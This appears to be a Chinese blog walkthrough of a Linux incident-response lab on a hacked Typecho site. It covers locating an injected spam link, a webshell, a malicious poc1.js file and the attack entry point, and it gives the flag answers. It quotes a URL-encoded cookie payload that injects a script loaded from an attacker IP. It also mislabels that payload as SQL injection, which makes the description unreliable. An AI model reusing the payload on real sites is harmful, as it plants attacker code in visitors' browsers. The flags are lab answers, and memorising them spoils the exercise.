第五章 linux实战-黑链

fasewer2024-09-30 20:09

finalshell通过ssh连接linux机器

1.找到黑链添加在哪个文件 flag 格式 flag{xxx.xxx}

执行查找命令

复制代码 
grep -rnw '/var/www/html/' -e '黑链'
代码分析
复制代码 
以下是对"grep -rnw '/var/www/html/' -e '黑链'"这段代码的分析:

一、整体功能

这段代码使用 grep 命令在指定的目录 /var/www/html/ 中搜索包含特定字符串"黑链"的内容。

二、参数解释

• -r:递归搜索,即对指定目录及其子目录中的所有文件进行搜索。

• -n:在输出结果中显示匹配行的行号。

• -w:只匹配整个单词,确保搜索的"黑链"不是其他单词的一部分。

• /var/www/html/:指定要搜索的目录路径。

• -e '黑链':指定要搜索的模式为"黑链"。

三、用途

主要用于查找可能存在的恶意黑链。在网站安全检查中,如果在 /var/www/html/ 目录下的网页文件中发现了"黑链"字样,可能意味着网站被黑客入侵并植入了非法链接,以便及时采取措施进行清理和修复,保障网站的安全和正常运行。

flag

复制代码 
flag{header.php}

2.webshell的绝对路径 flag{xxxx/xxx/xxx/xxx/}

下载html文件夹

使用D盾查杀

找到webshell后门文件特征($_POST)

flag

复制代码 
flag{/var/www/html/usr/themes/default/404.php}

3.黑客注入黑链文件的 md5 md5sum file flag{md5}

打开可疑文件所在位置

发现黑链文件

执行MD5编码命令

复制代码 
 certutil -hashfile .\poc1.js MD5
代码分析
复制代码 
以下是对"certutil -hashfile.\poc1.js MD5"这段代码的分析:

一、整体功能

这段代码使用 certutil 命令来计算指定文件(这里是当前目录下的"poc1.js"文件)的 MD5 哈希值。

二、参数解释

• -hashfile:表示对指定文件进行哈希计算。

• .\poc1.js:指定要计算哈希值的文件路径,这里是当前目录下的"poc1.js"文件。

• MD5:指定要计算的哈希算法为 MD5。

三、用途

1. 完整性校验:可以用于验证文件在传输或存储过程中是否被篡改。如果文件的 MD5 哈希值与预期的哈希值不同,那么文件很可能已经被修改。

2. 识别重复文件:不同的文件通常具有不同的 MD5 哈希值,所以可以通过比较文件的 MD5 哈希值来判断两个文件是否相同。

3. 安全检查:在某些安全场景下,通过计算文件的哈希值可以帮助检测恶意软件或非法修改的文件。

flag

复制代码 
flag{10c18029294fdec7b6ddab76d9367c14}

4.攻击入口是哪里?url请求路径,最后面加/ flag{/xxxx.xxx/xxxx/x/}

wireshark分析pacp文件

执行查找命令

复制代码 
http contains "poc1.js"
代码分析
复制代码 
以下是对"http contains "poc1.js""的分析:

一、整体含义

这可能是一个用于分析 HTTP 流量的过滤条件或搜索表达式。

二、具体解释

"http"通常代表与 HTTP 协议相关的内容,在这里可能指的是 HTTP 请求、响应或者是 HTTP 通信的日志等。"contains"表示包含的意思,后面的""poc1.js""是一个特定的字符串。

三、用途场景

1. 网络安全分析:在网络流量监测中,使用这个表达式可以快速筛选出包含特定文件名"poc1.js"的 HTTP 通信。这可能有助于检测潜在的恶意软件传播或异常的文件访问行为。例如,如果发现大量不明来源的 HTTP 请求中包含"poc1.js",可能暗示着有针对性的攻击活动。

2. 故障排查:在排查网络应用故障时,如果知道某个特定的脚本文件"poc1.js"可能与问题相关,通过这个表达式可以在大量的 HTTP 日志中快速定位到与该文件有关的通信记录,以便进一步分析问题的根源。

3. 性能优化:对于大型的网络应用,分析 HTTP 流量中特定文件的请求情况可以帮助优化资源加载策略。如果发现"poc1.js"文件的请求频率很高或者响应时间较长,可以考虑对该文件进行优化,如压缩、缓存或者优化服务器配置以提高响应速度。

找到可疑cookie,根据关键词得知这是SQL注入

对该cookie进行url解码

复制代码 
https://www.sojson.com/encodeurl.html
09f1f9758c26c309477b55f3a4bac8de__typecho_remember_url=http%3A%2F%2Fxxx.xxx.com%2F%22%3E%3C%2Fa%3E%3Cscript%2Fsrc%3Dhttp%3A%2F%2F192.168.20.130%2Fpoc1.js%3E%3C%2Fscript%3E%3Ca%2Fhref%3D%22%23

确定flag为

flag

复制代码 
flag{/index.php/archives/1/}
相关推荐
Web3探索者18 小时前
可视化服务器管理和传统命令行区别是什么?新手教程:Linux 运维到底该用图形界面还是 SSH 命令行?
linux·ssh
zylyehuo20 小时前
Linux系统中网线与USB网络共享冲突
linux
荣--1 天前
一键部署不是为了省时间 —— 它是把"买来的 PaaS"变成"自己的平台"的拐点
运维·zabbix·工程化·一键部署·平台化·边界设计
江华森1 天前
动手实战学 Docker — 从零到集群编排完全指南
运维
Avan_菜菜2 天前
FRP 内网穿透完整实战:从 HTTP 映射到 HTTPS 自签代理
运维·nginx·https
Sokach10152 天前
Linux Shell 脚本从零到能用:一个新手的一天学习总结
linux
SelectDB3 天前
Litefuse 开源并推出单进程轻量模式,25 秒就能跑起来的 Agent 可观测与评估平台
运维·后端·自动化运维
AlfredZhao3 天前
Docker 容器时区不对,`timedatectl` 不存在怎么办?
linux·timezone
zzzzzz3104 天前
9K Star 炸裂开源!这个 C 语言写的代码知识图谱,把 Linux 内核索引压缩到了 3 分钟
linux·服务器·sql
XIAOHEZIcode4 天前
Linux系统鼠标偏移常见原因以及修复方案
linux·运维·游戏
热门推荐
012026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?022026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf032026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?04Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析05【AI】2026 年具身智能模型和世界模型总结06【AI总结】2026年6月 主流国内外大模型总结07GitHub 镜像站点08AI科技热点日报 | 2026年6月1日09飞书长连接_事件订阅(接收消息,审批任务状态变更)10AI科技热点日报 | 2026年6月22日